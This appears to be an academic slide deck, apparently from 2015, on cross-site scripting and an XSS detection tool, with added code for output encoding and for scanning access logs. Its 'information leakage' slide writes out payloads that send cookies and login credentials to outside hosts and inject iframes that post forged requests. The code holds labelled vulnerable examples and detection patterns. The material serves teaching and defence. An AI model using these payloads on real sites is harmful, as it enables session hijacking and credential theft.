Posted: 08-May-2015 | Category: Technology | Uploaded by: arjun-jain
Cross-Site Scripting (XSS) attack detection for web applications
http://sourceforge.net/projects/xssalert7/
Author: Arjun Jain (07104701), Department of Computer Science and Information Technology,
Jaypee Institute of Information Technology, Sector-62, Noida, Uttar Pradesh
Agenda
- Overview of XSS attack
- Types of XSS attack
- Example
- Limitations of the attack
- DOM security overview
- XSS alert working model
- Demo
What is Cross-Site Scripting (XSS)?
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
Types:
1: Reflected XSS
2: Stored XSS
3: DOM-based XSS
Ranked #1 in the OWASP 2007 Top 10
Ranked #2 in the OWASP 2010 Top 10
7 out of 10 sites have XSS (Jeremiah Grossman, WhiteHat Website Security Statistics Report, Oct 2007)
Reflected XSS
Covers all non-persistent XSS issues, which occur when a web application blindly echoes parts of the HTTP request into the corresponding HTTP response HTML.
Example:
<?php
$name = $_GET["name"];   // attacker-controlled request parameter
echo "Hey " . $name;     // echoed into the page without HTML encoding
?>
$name may contain JavaScript.
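The echo above, rebuilt in Node.js beside a hardened version, as an added example (not code from the slides or from the XSS Alert project): renderGreetingUnsafe mirrors `echo "Hey " . $name;`, while renderGreetingSafe encodes the parameter for an HTML text context. renderInputUnsafe and renderInputSafe show the same value reflected into a quoted attribute, where input that starts with `">` closes the attribute and the tag unless the quote character is encoded as well. All function names and the sample input are constructed for this example.

```javascript
// Added example, not from the original slides: the reflected echo from the PHP
// snippet rebuilt in Node.js, with the hardened form beside it.

// Encode the five characters that let untrusted text change HTML structure.
// Covering the quotes as well as < > & is what makes the attribute case safe.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable (mirrors `echo "Hey " . $name;`): the request parameter is
// concatenated straight into the response body, so markup in it is parsed.
function renderGreetingUnsafe(name) {
  return `<p>Hey ${name}</p>`;
}

// Hardened: same page, but the untrusted value is encoded for the HTML text
// context, so the browser renders the payload as literal characters.
function renderGreetingSafe(name) {
  return `<p>Hey ${escapeHtml(name)}</p>`;
}

// Vulnerable attribute context (constructed): the value is reflected into a
// quoted attribute. Input beginning with `">` terminates the attribute and the
// tag, and whatever follows becomes new markup.
function renderInputUnsafe(value) {
  return `<input name="variable" value="${value}">`;
}

// Hardened attribute context: always quote the attribute AND encode the quote
// character, so the input cannot break out of the value.
function renderInputSafe(value) {
  return `<input name="variable" value="${escapeHtml(value)}">`;
}

// Crude oracle used to compare the two forms: does a live <script> tag survive
// in the generated HTML? (Good enough for a demo; real testing uses a parser.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample standing in for an attacker-controlled GET parameter; the
// leading `">` is what lets it escape the attribute context.
const SAMPLE_INPUT = '"><script>alert(1)</script>';

function demo() {
  return {
    unsafeText: renderGreetingUnsafe(SAMPLE_INPUT),
    safeText: renderGreetingSafe(SAMPLE_INPUT),
    unsafeAttr: renderInputUnsafe(SAMPLE_INPUT),
    safeAttr: renderInputSafe(SAMPLE_INPUT),
  };
}

console.log(demo());
```

Encoding is context-specific: the table above is correct for HTML text and quoted attribute values, but a value placed inside a script block or a URL needs a different encoder, which is why frameworks distinguish output contexts rather than offering one "sanitize" call.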
Stored XSS
Refers to all XSS vulnerabilities where the adversary is able to permanently inject the malicious script into the vulnerable application's storage. As a result, every user who accesses the poisoned web page receives the injected script without further action by the adversary.
DOM-based XSS
A special variant of reflected XSS, where logic errors in legitimate JavaScript and careless use of client-side data result in an XSS condition.
Example
(Screenshots: unvalidated input resulted in a cross-site scripting attack and the theft of the administrator's cookies.)
Types of information leakage
Client can reveal cookies to a 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to a 3rd party (userID/passwd, etc.):
<form action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;"></form>
Client can be tricked into accessing/posting spoofed info to a trusted server:
www.trustedserver.com/xss.asp?name=<iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
Client can be tricked into attacking other sites:
/hello.asp?name=<iframe src=http://vuln.iis.server/scripts/root.exe?/c+dir></iframe>
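Because these attacks ride on GET requests, the payload ends up verbatim in the web server's access log, which makes the log a practical detection point. As an added example (not part of the slides or of the XSS Alert tool), the Node.js scanner below pulls the request target out of Common Log Format lines, percent-decodes it repeatedly to undo double encoding, and flags requests carrying the indicator shapes seen in the payloads above (`<script`, `<iframe`, `javascript:`, inline event handlers, `document.cookie`). The log lines, IP addresses, the example.invalid host and the indicator names are constructed; the second line carries the cookie-theft URL from the slide in percent-encoded form.

```javascript
// Added example, not from the original slides: flag XSS-style payloads in web
// server access logs. Heuristic indicator matching: expect false positives and
// treat hits as triage leads, not verdicts.

// Constructed sample log (Common Log Format). Line 2 carries the cookie-theft
// URL from the slide, percent-encoded; line 3 an iframe injection; 1 and 4 are benign.
const SAMPLE_LOG = [
  '10.0.0.5 - - [08/May/2015:10:01:02 +0530] "GET /a.php?variable=hello HTTP/1.1" 200 512',
  '10.0.0.9 - - [08/May/2015:10:01:07 +0530] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.cgisecurity.com%2Fcgi-bin%2Fcookie.cgi%3F%27%20%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 498',
  '10.0.0.7 - - [08/May/2015:10:02:11 +0530] "GET /hello.asp?name=%3Ciframe%20src%3Dhttp%3A%2F%2Fexample.invalid%2Fx%3E%3C%2Fiframe%3E HTTP/1.1" 200 301',
  '10.0.0.3 - - [08/May/2015:10:03:00 +0530] "POST /login HTTP/1.1" 302 0',
];

// Indicators derived from the payload shapes on the slide. Array order only
// determines the order in which matched names are reported.
const INDICATORS = [
  ['script-tag',    /<\s*script\b/i],
  ['iframe-tag',    /<\s*iframe\b/i],
  ['js-uri',        /javascript\s*:/i],
  ['event-handler', /\bon[a-z]+\s*=/i],
  ['cookie-access', /document\s*\.\s*cookie/i],
];

// Pull the request target out of the quoted request line, e.g. "GET /x HTTP/1.1".
function extractRequestTarget(line) {
  const m = /"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS) (\S+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : null;
}

// Decode percent-encoding repeatedly (bounded) so that double-encoded payloads
// such as %253Cscript%253E are normalised before matching. Stops on malformed
// escapes rather than throwing, keeping the last successfully decoded form.
function fullyDecode(target, maxRounds = 3) {
  let current = target;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, ' '));
    } catch (err) {
      break; // URIError on a stray '%': fall back to what we already have
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return the names of all indicators present in a decoded request target.
function matchIndicators(decodedTarget) {
  return INDICATORS.filter(([, re]) => re.test(decodedTarget)).map(([name]) => name);
}

// Scan an array of log lines; report only lines with at least one indicator.
function scanAccessLog(lines) {
  const hits = [];
  lines.forEach((line, i) => {
    const target = extractRequestTarget(line);
    if (!target) return; // not a parsable request line
    const decoded = fullyDecode(target);
    const indicators = matchIndicators(decoded);
    if (indicators.length > 0) {
      hits.push({ lineNo: i + 1, decoded, indicators });
    }
  });
  return hits;
}

for (const hit of scanAccessLog(SAMPLE_LOG)) {
  console.log(`line ${hit.lineNo}: ${hit.indicators.join(', ')} -> ${hit.decoded}`);
}
```

The repeated decoding matters more than the indicator list: a single decode pass misses `%253C`, and a scanner that throws on a malformed escape can be blinded by one stray `%`. POST bodies are not logged in this format, which is one reason the slide's observation that attackers rarely use POST is a limitation for the attacker but a blind spot for log-based detection.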
Limitations of these attacks
- Usually only get one transaction with XSS code against the vulnerable site
- Most attacks are only focused on collecting cookies
- POST-based forms are seldom leveraged; attacks almost always use GET methods
- Attacker does not know the actual responses sent to the client
- Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.
DOM security overview
Child windows and same-site trust:
- Scripts can interact between the two windows
- Script content can be loaded from anywhere (RPC/remote scripting is common)
- Images can be loaded from anywhere
- JavaScript can either be within <script></script> tags, loaded from elsewhere via <script src=remote.com>, or attached to many tags, e.g. <img src=javascript:... onload=...>
- Form GET/POST can be to another site or a JavaScript action
- XSS allows DOM abuse, but still follows DOM rules
XSS alert working model
Demo
Attack on a Yahoo server with the GET string "?q="
Final Result
Thank You!